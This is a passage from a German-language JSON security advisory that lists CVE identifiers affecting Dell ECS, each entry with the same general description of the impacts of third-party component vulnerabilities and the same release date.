"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2344"
},
{
"cve": "CVE-2022-2345",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2345"
},
{
"cve": "CVE-2022-23471",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23471"
},
{
"cve": "CVE-2022-23521",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23521"
},
{
"cve": "CVE-2022-23772",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23772"
},
{
"cve": "CVE-2022-23773",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-23773"
},
{
"cve": "CVE-2022-24302",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-24302"
},
{
"cve": "CVE-2022-24329",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-24329"
},
{
"cve": "CVE-2022-24823",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-24823"
},
{
"cve": "CVE-2022-24903",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-24903"
},
{
"cve": "CVE-2022-2503",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2503"
},
{
"cve": "CVE-2022-25147",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-25147"
},
{
"cve": "CVE-2022-25168",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-25168"
},
{
"cve": "CVE-2022-2519",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2519"
},
{
"cve": "CVE-2022-2520",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2520"
},
{
"cve": "CVE-2022-2521",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2521"
},
{
"cve": "CVE-2022-2522",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2522"
},
{
"cve": "CVE-2022-25647",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-25647"
},
{
"cve": "CVE-2022-2571",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2571"
},
{
"cve": "CVE-2022-2580",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2580"
},
{
"cve": "CVE-2022-2581",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2581"
},
{
"cve": "CVE-2022-25857",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-25857"
},
{
"cve": "CVE-2022-2588",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2588"
},
{
"cve": "CVE-2022-2598",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2598"
},
{
"cve": "CVE-2022-26148",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-26148"
},
{
"cve": "CVE-2022-26365",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-26365"
},
{
"cve": "CVE-2022-26373",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-26373"
},
{
"cve": "CVE-2022-2639",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2639"
},
{
"cve": "CVE-2022-26612",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-26612"
},
{
"cve": "CVE-2022-2663",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2663"
},
{
"cve": "CVE-2022-27781",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-27781"
},
{
"cve": "CVE-2022-27782",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-27782"
},
{
"cve": "CVE-2022-27943",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-27943"
},
{
"cve": "CVE-2022-2795",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2795"
},
{
"cve": "CVE-2022-28131",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-28131"
},
{
"cve": "CVE-2022-2816",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2816"
},
{
"cve": "CVE-2022-2817",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2817"
},
{
"cve": "CVE-2022-2819",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2819"
},
{
"cve": "CVE-2022-28327",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-28327"
},
{
"cve": "CVE-2022-2845",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2845"
},
{
"cve": "CVE-2022-2849",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2849"
},
{
"cve": "CVE-2022-2862",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2862"
},
{
"cve": "CVE-2022-2867",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2867"
},
{
"cve": "CVE-2022-2868",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2868"
},
{
"cve": "CVE-2022-2869",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2869"
},
{
"cve": "CVE-2022-28693",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-28693"
},
{
"cve": "CVE-2022-2874",
"notes": [
{
"category": "description",
